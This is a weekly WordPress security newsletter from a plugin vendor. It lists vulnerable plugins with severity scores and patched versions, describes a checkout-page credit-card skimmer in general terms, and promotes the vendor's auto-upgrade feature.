There are a couple of really crucial security patches needed for a few popular plugins, alongside high risks in lesser-used plugins.
There’s also new malware targeting e-commerce checkout pages and tips to secure WP forms, from our blog.
#1 – High Security Risks in Popular Plugins
The plugins below have extremely high severity vulnerabilities.
GiveWP Plugin
PHP Object Injection; 9.8/10; Update to v3.19.4+
Modula Image Gallery Plugin
Arbitrary File Upload; 9.1/10; Update to v2.11.11+
Editor Comment
It’s worth taking a few minutes each week to perform a sites review to catch issues early and wherever possible, use ShieldPRO’s auto-upgrade feature for vulnerable plugins.
#2 – Lower Security Risks in Popular Plugins
The following widely used plugins may not be critically at risk, but they affect a significant number of sites.
Orbit Fox by ThemeIsle Plugin
XSS; 6.5/10; Update to v2.10.44+
DearFlip Plugin
XSS; 6.5/10; Update to v2.3.53+
Essential Blocks for Gutenberg Plugin
XSS; 5.9/10; Update to v5.1.1+
InfiniteWP Client
Directory Traversal; 5.3/10; Update to v1.13.1+
Post Duplicator Plugin
Broken Access Control; 5.3/10; Update to v2.37+
Post SMTP Plugin
Broken Access Control; 4.3/10; Update to v2.9.12+
Editor Comment
It’s worth taking a few minutes each week to perform a sites review to catch issues early and wherever possible, use ShieldPRO’s auto-upgrade feature for vulnerable plugins.
#3 – High Security Risks in Less Popular Plugins & Themes
The below plugins and theme may have lower usage, but they carry extreme high risks – 1 have been removed from the wp.org with no-fix.
WordPress File Upload Plugin
RCE; 10/10; Update to v4.25.0+
AdForest Theme
Privilege Escalation; 10/10; Update to v5.1.7+
SKT Page Builder Plugin
Arbitrary File Upload; 9.9/10; Update to v4.8+
WebinarPress Plugin
Broken Access Control; 9.9/10; Update to v1.33.25+
Post Grid Master Plugin
Local File Inclusion; 9.8/10; Removed from wp.org; No fix; Remove/or replace.
Cost Calculator Builder Pro Plugin
SQL Injection; 9.1/10; Update to v3.2.16+
Garden Gnome Package Plugin
Arbitrary File Upload; 9.1/10; Update to v2.4.0+
Editor Comment
It’s worth taking a few minutes each week to perform a sites review to catch issues early and wherever possible, use ShieldPRO’s auto-upgrade feature for vulnerable plugins.
#4 – WordPress Checkout Pages Compromised
A new credit card stealing malware targets WordPress checkout pages by injecting malicious JavaScript into the wp_options table. It creates fake payment forms or intercepts real ones to steal sensitive payment details during checkout. The malware activates only on pages with “checkout” in the URL, ensuring covert data theft and mimicking legitimate payment processors like Stripe.
It’s crucial to perform a site review to identify, remove, and prevent the attacks.
#5 – Our blog: Create and Secure WordPress Forms in 3 Easy Steps
Forms are a key way users interact with WordPress sites but are vulnerable to attacks. Learn how to protect them easily and improve your site’s overall security, ensuring a safer experience for your users.
Thanks for reading, and have a wonderful week!
Paul Goodchild
Shield Security for WordPress
